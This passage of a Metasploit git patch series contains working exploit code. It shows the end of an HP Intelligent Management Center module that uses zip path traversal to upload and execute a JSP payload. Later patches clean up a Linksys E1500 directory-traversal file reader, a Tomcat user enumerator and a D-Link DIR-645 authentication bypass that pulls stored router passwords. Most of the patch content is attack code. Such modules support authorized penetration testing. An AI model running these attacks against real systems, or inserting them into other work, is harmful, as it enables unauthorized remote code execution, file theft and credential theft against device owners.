'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-5201' ], + [ 'OSVDB', '91026' ], + [ 'BID', '58385' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ], + [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 07 2013')) + + register_options( + [ + Opt::RPORT(8080), + OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + @peer = "#{rhost}:#{rport}" + + # New lines are handled and the payload goes corrupted + jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") + jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + + # Zipping with CM_STORE to avoid errors while zip decompressing + # on the Java vulnerable application + zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) + zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp) + + post_data = Rex::MIME::Message.new + post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") + + # Work around an incompatible MIME implementation + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + print_status("#{@peer} - Uploading the JSP payload...") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" + }) + + if res and res.code == 200 and res.body.empty? + print_status("#{@peer} - JSP payload uploaded successfully") + register_files_for_cleanup(jsp_name) + else + fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") + end + + print_status("#{@peer} - Executing payload...") + send_request_cgi({ + 'uri' => normalize_uri(jsp_name), + 'method' => 'GET' + }) + + end + +end From d54687cb37afbe3af5d92c3a01df9d0028fe358e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 00:58:47 +0100 Subject: [PATCH 15/21] fix typo --- modules/exploits/windows/http/hp_imc_mibfileupload.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index f081025310..8d44ad8ee9 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested - successfully on HP Intelligent Management Center 5.1 E0202 on Windows 2003 SP2. + successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, 'Author' => [ @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit @peer = "#{rhost}:#{rport}" - # New lines are handled and the payload goes corrupted + # New lines are handled on the vuln app and payload is corrupted jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" From ea804d433e380d5be4360cc52c82bd5392b379ec Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 17:33:16 +0100 Subject: [PATCH 16/21] change file name --- .../http/{linksys_traversal.rb => linksys_e1500_traversal.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/http/{linksys_traversal.rb => linksys_e1500_traversal.rb} (100%) diff --git a/modules/auxiliary/scanner/http/linksys_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb similarity index 100% rename from modules/auxiliary/scanner/http/linksys_traversal.rb rename to modules/auxiliary/scanner/http/linksys_e1500_traversal.rb From 53b862300eccf425fda56cd680848b882059dfc7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 17:33:38 +0100 Subject: [PATCH 17/21] cleanup for linksys_e1500_traversal --- .../scanner/http/linksys_e1500_traversal.rb | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb index f370dc8a8d..4b8801578e 100644 --- a/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb @@ -14,18 +14,18 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Linksys Directory Traversal Vulnerability', + 'Name' => 'Linksys E1500 Directory Traversal Vulnerability', 'Description' => %q{ - This module exploits a directory traversal vulnerablity which is present in different - Linksys home routers like the E1500. - }, + This module exploits a directory traversal vulnerability which is present in + different Linksys home routers, like the E1500. + }, 'References' => [ [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], [ 'BID', '57760' ], [ 'OSVDB', '89911' ], - [ 'EDB', '24475' ], + [ 'EDB', '24475' ] ], 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE @@ -58,8 +58,7 @@ class Metasploit3 < Msf::Auxiliary uri = "/apply.cgi" traversal = '../..' data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file - res = send_request_cgi( - { + res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'authorization' => basic_auth(user,pass), @@ -86,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary :method => "POST" }) - loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + loot = store_loot("linksys.traversal.data","text/plain", rhost, res.body, file) vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") elsif (res and res.code) vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") @@ -105,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,pass) - }) + }) return if res.nil? return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) @@ -124,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary end extract_words(datastore['SENSITIVE_FILES']).each do |file| - find_files(file,user,pass) unless file.empty? + find_files(file, user, pass) unless file.empty? end end end From 99fe2a33d7434cc055e6a593a57e885468f8138c Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 25 Mar 2013 12:35:52 -0400 Subject: [PATCH 18/21] Deregister USER_AS_PASS and stop on connect error --- modules/auxiliary/scanner/http/tomcat_enum.rb | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 00204eb184..89af628a68 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]), ], self.class) - deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') + deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','USER_AS_PASS','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME') end def target_url @@ -56,12 +56,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) @users_found = {} + results = "" each_user_pass { |user,pass| - do_login(user) + results = do_login(user) + if results == "NetworkError" + break + end } - if(@users_found.empty?) + if results == "NetworkError" + print_error("#{target_url} - UNREACHABLE") + elsif(@users_found.empty?) print_status("#{target_url} - No users found.") else print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}") @@ -100,7 +106,9 @@ class Metasploit3 < Msf::Auxiliary end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + return "NetworkError" rescue ::Timeout::Error, ::Errno::EPIPE + return "NetworkError" end end From 3f79b2fd3b399ebb2be187f9b4a4c2f42b0e5170 Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 25 Mar 2013 12:59:18 -0400 Subject: [PATCH 19/21] Use :abort for scanner mixin --- modules/auxiliary/scanner/http/tomcat_enum.rb | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 89af628a68..c650899cbd 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -56,18 +56,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) @users_found = {} - results = "" each_user_pass { |user,pass| - results = do_login(user) - if results == "NetworkError" - break - end + do_login(user) } - - if results == "NetworkError" - print_error("#{target_url} - UNREACHABLE") - elsif(@users_found.empty?) + + if(@users_found.empty?) print_status("#{target_url} - No users found.") else print_good("#{target_url} - Users found: #{@users_found.keys.sort.join(", ")}") @@ -105,10 +99,9 @@ class Metasploit3 < Msf::Auxiliary return :abort end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - return "NetworkError" - rescue ::Timeout::Error, ::Errno::EPIPE - return "NetworkError" + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE + print_error("#{target_url} - UNREACHABLE") + return :abort end end From aad0eed48560270a729e4d41b593ba7ee1326ccf Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Mon, 25 Mar 2013 13:00:37 -0400 Subject: [PATCH 20/21] Fix whitespace EOL --- modules/auxiliary/scanner/http/tomcat_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index c650899cbd..40ddbfb8d7 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary each_user_pass { |user,pass| do_login(user) } - + if(@users_found.empty?) print_status("#{target_url} - No users found.") else From fdd06c923ae1ca7684c22ee5c316debc70df469e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 25 Mar 2013 18:04:12 +0100 Subject: [PATCH 21/21] cleanup for dlink_dir_645_password_extractor --- .../http/dlink_dir_645_password_extractor.rb | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 0c6c781e36..0f98f7352d 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -16,19 +16,21 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'DLink DIR 645 Password Extractor', 'Description' => %q{ - This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. - With this vulnerability you are able to extract the password for the remote management. - }, + This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. + With this vulnerability you are able to extract the password for the remote + management. + }, 'References' => [ - [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ], + [ 'OSVDB', '90733' ], [ 'BID', '58231' ], - [ 'OSVDB', '90733' ] + [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ] + ], + 'Author' => + [ + 'Roberto Paleari ', # Vulnerability discovery + 'Michael Messner ' # Metasploit module ], - 'Author' => [ - 'Michael Messner ', #metasploit module - 'Roberto Paleari ' #vulnerability discovery - ], 'License' => MSF_LICENSE ) end @@ -45,8 +47,9 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/getcfg.php', 'method' => 'POST', - 'vars_post' => { - 'SERVICES' => 'DEVICE.ACCOUNT' + 'vars_post' => + { + 'SERVICES' => 'DEVICE.ACCOUNT' } }) @@ -58,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary print_good("#{rhost}:#{rport} - credentials successfully extracted") #store all details as loot -> there is some usefull stuff in the response - loot = store_loot("account_details.txt","text/plain",rhost, res.body) + loot = store_loot("dlink.dir645.config","text/plain",rhost, res.body) print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") res.body.each_line do |line| @@ -78,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary :user => @user, :pass => pass, :active => true - ) + ) end end end